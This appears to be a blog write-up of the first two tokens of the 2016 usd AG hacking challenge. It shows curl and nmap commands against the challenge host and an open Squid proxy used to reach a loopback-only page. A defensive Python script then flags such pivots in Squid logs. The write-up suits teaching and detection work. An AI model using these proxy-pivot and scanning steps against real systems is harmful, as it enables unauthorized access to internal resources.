usd hacking challenge 2016 writeup: tokens 1 and 2

This is part 1 in a series of writeups on the 2016 usd AG hacking challenge.

Introduction

I found the gradual increase in difficulty quite nice in this challenge. The first two tokens were for warm-up.

Token 1 - gotta get our heads just right

Within the first few seconds of this engagement, I had already looked at the HTTP response headers of the site. So there it was, the first token in plain sight:

js@eris:~/usdhc$ curl -I http://82.195.79.113/index.php
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2016 21:55:22 GMT
Server: Apache
Token: 583397
Content-Type: text/html; charset=UTF-8

Token 2 - no place like 127.0.0.1

js@eris:~/usdhc$ curl http://82.195.79.113/restricted/

<!DOCTYPE html>
<html>
<head>
<title>usd Hackertag Challenge Webseite</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" >
[..]
<div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>
[..]

Only local admins? I did think of what turned out to be the solution right when I read this, but first started to poke around aimlessly with cookies, parameters, hidden files, etc. I even did a fruitless nikto scan. The next morning it occurred to me that I had not even done a basic port scan of the challenge site, so without expecting too much I fired up nmap:

js@eris:~/usdhc$ nmap -A 82.195.79.113

Starting Nmap 6.40 ( http://nmap.org ) at 2016-03-19 22:01 CET
Nmap scan report for 82.195.79.113
Host is up (0.022s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: usd Hackertag Challenge Webseite
3128/tcp open  http-proxy Squid http proxy 3.4.8
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
Aggressive OS guesses: Netgear DG834G WAP or Western Digital WD TV media player (92%), Linux 2.6.32 - 2.6.36 (90%), Linux 3.1 (89%), Linux 3.2 (89%), AXIS 210A or 211 Network Camera (Linux 2.6) (88%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (88%), Linux 3.7 - 3.9 (88%), ODROID-U2 Android development board (Linux 3.0) (88%), Linux 2.6.32 (88%), Linux 3.6.10 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 8 hops

Oh, Squid! Let's see:

js@eris:~/usdhc$ curl -sx http://82.195.79.113:3128 http://localhost/restricted/ | grep -i token
<div id="contentliquid"><div id="content">Token value can only be viewed by local admins.</div></div>

Hmm. It seemed I could connect through the proxy, but still no token. How about this:

js@eris:~/usdhc$ curl -sx http://82.195.79.113:3128 http://127.0.0.1/restricted/ | grep -i token
<div id="contentliquid"><div id="content">Token: 134923</div></div>

Home, sweet home.
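From the defender's side, the interesting part of token 2 is that a proxy reachable from the internet was allowed to forward requests to its own loopback interface, which turns a "local admins only" check based on the client address into no check at all. The script below is an added example, not part of the original writeup or of the challenge, that shows how such a pivot looks in Squid's default (native) access.log format and flags it: a request from a non-local client whose URL host or connected peer is a loopback, RFC1918 or link-local address. The log lines are constructed for the example (the 203.0.113.x and 198.51.100.x clients are documentation addresses), and the function names are my own.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed sample lines in Squid's native access.log format:
# time elapsed client action/code bytes method URL ident hierarchy/peer type
# These are made up for this example, not taken from the challenge host.
SAMPLE_LOG = """\
1458424922.101     45 203.0.113.5 TCP_MISS/200 1532 GET http://localhost/restricted/ - HIER_DIRECT/127.0.0.1 text/html
1458424931.472     38 203.0.113.5 TCP_MISS/200 1498 GET http://127.0.0.1/restricted/ - HIER_DIRECT/127.0.0.1 text/html
1458424950.003    120 203.0.113.5 TCP_MISS/200 8810 GET http://example.org/ - HIER_DIRECT/93.184.216.34 text/html
1458424960.550     12 127.0.0.1 TCP_MISS/200 1498 GET http://127.0.0.1/ - HIER_DIRECT/127.0.0.1 text/html
1458424975.219     90 198.51.100.9 TCP_MISS/200 640 GET http://10.0.0.5/admin/ - HIER_DIRECT/10.0.0.5 text/html
"""

# Source addresses that are genuinely "local" to the proxy host (assumed policy).
LOCAL_CLIENTS = [ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128")]


@dataclass
class ProxyRequest:
    client: str
    method: str
    url: str
    peer: Optional[str]  # address Squid actually connected to, if logged


def parse_native_line(line: str) -> Optional[ProxyRequest]:
    """Parse one line of Squid's native access.log format; None if malformed."""
    fields = line.split()
    if len(fields) < 9:
        return None
    hierarchy = fields[8]  # e.g. HIER_DIRECT/127.0.0.1 or HIER_NONE/-
    peer = hierarchy.split("/", 1)[1] if "/" in hierarchy else None
    if peer == "-":
        peer = None
    return ProxyRequest(client=fields[2], method=fields[5], url=fields[6], peer=peer)


def is_internal_address(host: Optional[str]) -> bool:
    """True for 'localhost' names and loopback, RFC1918 or link-local IP literals."""
    if not host:
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; resolving it is out of scope for a log check
    return ip.is_loopback or ip.is_private or ip.is_link_local


def is_local_client(client: str) -> bool:
    """True if the requesting client sits in one of the LOCAL_CLIENTS networks."""
    try:
        ip = ipaddress.ip_address(client)
    except ValueError:
        return False
    return any(ip in net for net in LOCAL_CLIENTS)


def find_internal_pivots(log_text: str) -> List[ProxyRequest]:
    """Return requests where a non-local client used the proxy to reach an internal address.

    Both the URL host and the peer Squid connected to are checked, so a name like
    'localhost' is caught even when only the hierarchy field shows the real address.
    """
    hits = []
    for line in log_text.splitlines():
        req = parse_native_line(line)
        if req is None or is_local_client(req.client):
            continue
        dest = urlsplit(req.url).hostname
        if is_internal_address(dest) or is_internal_address(req.peer):
            hits.append(req)
    return hits


if __name__ == "__main__":
    for hit in find_internal_pivots(SAMPLE_LOG):
        print(f"ALERT client={hit.client} {hit.method} {hit.url} peer={hit.peer}")
```

Run against the constructed log it reports the two requests to the loopback interface and the one to a private address, and ignores both the ordinary outbound request and the request that really came from 127.0.0.1. Detection is the fallback, though: Squid's stock squid.conf already ships `acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1` with `http_access deny to_localhost`, and access from arbitrary source networks is only possible when the `http_access` rules allow it, so the challenge box had to be configured more permissively than the defaults on both counts.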

On to part 2!
